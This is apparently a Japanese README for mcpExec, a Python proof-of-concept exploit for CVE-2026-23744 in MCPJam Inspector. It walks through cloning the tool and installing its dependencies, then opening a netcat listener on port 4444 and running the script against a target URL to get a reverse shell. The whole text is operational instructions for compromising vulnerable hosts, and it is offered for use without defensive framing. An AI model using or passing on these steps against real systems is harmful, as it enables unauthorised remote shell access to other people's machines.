
python revshell 用の CVE-2026-23744 の POC
mcpExec は、脆弱な MCPJam Inspector インストールの URL を用いて CVE-2026-23744 を悪用し、リバースシェルを取得するツールです。
git clone https://github.com/daemoncibsec/mcpExec.git
cd mcpExec
python3 -m venv venv
source venv/bin/activate
pip install rich
pip install argparse
pip install requests
chmod +x mcpExec.py
venv を終了するには:
deactivate
エクスプロイトを機能させるためにリスナーを開きます:
nc -nvlp 4444
このコマンドでリバースシェルが取得できます(影響を受けるシステムに Python3 がインストールされている場合)。
./mcpExec.py http://localhost:6274